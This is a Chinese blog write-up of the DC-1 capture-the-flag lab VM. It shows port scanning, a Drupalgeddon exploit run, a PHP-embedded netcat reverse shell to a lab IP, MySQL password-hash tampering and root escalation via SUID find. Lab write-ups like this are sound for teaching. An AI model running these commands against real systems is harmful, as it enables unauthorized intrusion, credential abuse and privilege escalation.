首页 > 其他分享 >DC-1

DC-1

时间:2024-04-18 21:45:33浏览次数:23  
标签:bin www DC cat flag4 usr find

DC-1渗透测试过程

端口扫描

nmap -sC -sV -Pn 192.168.56.119
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind

开了三个端口

访问web页面

发现是drupal这个cms,用droopescan进行扫描

droopescan scan drupal -u http://192.168.56.119
[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Possible interesting urls found:
    Default admin - http://192.168.56.119/user/login

[+] Scan finished (0:07:52.768780 elapsed)

扫到大概版本和登录页面

漏洞发现和利用

寻找相关漏洞

searchsploit drupal 7

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)

找到了这个POC,尝试是否可以利用

python2 34992.py -t http://192.168.56.119/ -u dabai -p 123456

然后就可以登录该账号,找到flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

特殊的perms将有助于查找密码,但您需要执行该命令才能找到shadow中的内容

找到Modules,勾选PHP filter,并设置权限。,将Use the PHPcode text format设置为管理员

image-20240418204912750

这样我们就可以在文章里写PHP代码

<?php system("nc -e /bin/bash 192.168.56.101 1234");?>

找到flag1

www-data@DC-1:/var/www$ cat flag1.txt
Every good CMS needs a config file - and so do you.

利用mysql重置密码

提示查看配置文件,位于Drupal安装目录下的/sites/default/文件夹中

www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

发现flag2

flag2
Brute force and dictionary attacks aren't the
only ways to gain access (and you WILL need access).
What can you do with these credentials?
爆破攻击和字典攻击不是
获得访问权限的唯一方法(您将需要访问权限)。
你能用这些证书做什么?

找到Mysql的账户,尝试登录

mysql -udbuser -pR0ck3t

然后在drupaldb数据库,users表下,查看了用户名和密码

select name,pass from users;
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |                                     
| Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |                                     
+-------+---------------------------------------------------------+

用john进行爆破哈希,发现那个用户都爆破不出来,那就尝试修改

john admin --wordlist=/usr/share/wordlists/rockyou.txt

john Fred --wordlist=/usr/share/wordlists/rockyou.txt

drupal常用密码加密是MD5格式,但是7.0以后因为安全性问题将加密方式改成了hash加密

Drupal7密码重置

www-data@DC-1:/var/www$ php ./scripts/password-hash.sh 123456
php ./scripts/password-hash.sh 123456

password: 123456                hash: $S$DmIUpIuKdJDVbkgk5BN6BFLX1ASLJB5H9LCYdzwjflmNjrOOE4zy

一定不要进scripts目录,然后修改users

update users set pass='$S$DdjovdQivVxu7Nqjmxb1bbxZtzuiEBHDfqogPLcuSUMtB25gM/u/' where name='admin';

然后就可以登录了(这里和前面增加的账号是一样的效果,预期解应该是这样)

提权

那就回到靶机

查看passwd文件,有一个flag4用户

www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
......
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

进入flag4的家目录,发现flag4

bash-4.2$ ls -l
ls -l
total 4
-rw-r--r-- 1 flag4 flag4 125 Feb 19  2019 flag4.txt
bash-4.2$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

shadow文件还不能查看

sudo命令不能用,查看有suid权限的文件,一眼看到find

www-data@DC-1:/var/www$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

find提权

www-data@DC-1:/var/www$ find / -exec "/bin/sh" \;
find / -exec "/bin/sh" \;
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

直接就拿到了root权限,拿到最终flag

# cd /root
cd /root
# ls
ls
thefinalflag.txt
# cat t*
cat t*
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

总结

1.我并没有按MSF的方法进行漏洞利用,而是先打web漏洞得到后台账号,然后利用PHP filter模块执行PHP代码,反弹shell,提权

2.认识一款droopescan扫描器,可以扫drupal这个cms

3.drupal数据库中密码的加密方式是利用/scripts/password-hash.sh这个文件

4.find提权find / -exec "/bin/sh" \;

标签:bin,www,DC,cat,flag4,usr,find
From: https://www.cnblogs.com/C0rr3ct/p/18144456

相关文章

  • leedcode-判断子序列
    自己写的,有点麻烦classSolution:defisSubsequence(self,s:str,t:str)->bool:#第一步先验证s是t的无序子序列#使用字典记录t中每个字符的出现次数mydict=dict()foriint:ifnotmydict.get(i):......
  • 【转】[C#][WPF] GridControl 列宽控制
    在设置DevExpress里的GridControl自动列宽时,有两个方式:view.BestFitColumn(gridColumn);view.BestFitColumns();但我想要达到这样的效果:1、加载配置,读取列宽2、未配置列宽的列自动列宽发现可以这样组合://如果已配置列宽,自动列宽就是配置的宽度if(gridColumn.Widt......
  • BOSHIDA DC电源模块的发展趋势和前景展望
    BOSHIDADC电源模块的发展趋势和前景展望随着电子产品的普及和多样化,对电源模块的需求也越来越大。其中,DC电源模块作为一种重要的电源供应方式,在各个领域有着广泛的应用。在过去的几十年里,DC电源模块已经经历了多次技术革新和发展,未来的发展趋势也值得关注。本文将从多个方面对DC......
  • DEV+GridControl实现反选
    最近在使用Dev+Winform,看了很多资料都是些复制粘贴,可能作者也没实践过,自己就记录总结下,也特别简单 主要代码,///<summary>///反选///</summary>///<paramname="sender"></param>///<paramname="e"></param>privatevoidsimpleButton5_Cl......
  • GridControl列自动匹配宽度(转)
    //自动调整所有字段宽度this.gridView1.BestFitColumns();//调整某列字段宽度this.gridView1.Columns[n].BestFit(); 大多是网上零散找到的,小部分是自己使用的时候自己遇到的。 XtraGrid的关键类就是:GridControl和GridView。GridControl本身不显示数据,数据都是显示在Grid......
  • 运行程序出现msadodc.ocx未注册控件无法找到问题
    其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个msadodc.ocx文件(挑选合适的版本文件)把它放入......
  • DevExpress使用方法GridControl总结 (转)
    DevExpress使用方法GridControl总结1.隐藏最上面的GroupPanel gridView1.OptionsView.ShowGroupPanel=false; 2.得到当前选定记录某字段的值 sValue=Table.Rows[gridView1.FocusedRowHandle][FieldName].ToString();3.数据只读 gridView1.OptionsBehavior.Edit......
  • DC-2
    DC-2渗透测试过程端口扫描nmap-sC-sV-Pn192.168.56.117StartingNmap7.94SVN(https://nmap.org)at2024-04-1608:22EDTNmapscanreportfor192.168.56.117Hostisup(0.00046slatency).Notshown:999closedtcpports(reset)PORTSTATESERVICEVERSI......
  • leedcode-字符串中的第一个唯一字符
    自己写的,easyclassSolution:deffirstUniqChar(self,s:str)->int:mydict={}#创建一个空字典来存储每个字符的出现次数foriins:#遍历给定的字符串sifnotmydict.get(i):#如果当前字符不在字典中mydic......
  • DC-3
    DC-3渗透测试过程主机发现arp-scan-l靶机ip192.168.56.113就开启了一个80端口,直接去看web页面目录扫描用cmseek扫描到cms的名字和版本joomscan扫描joomscan-uhttp://192.168.56.113漏洞发现和利用找到该cms的历史漏洞它的利用方法是UsingSqlmap:sqlmap-u......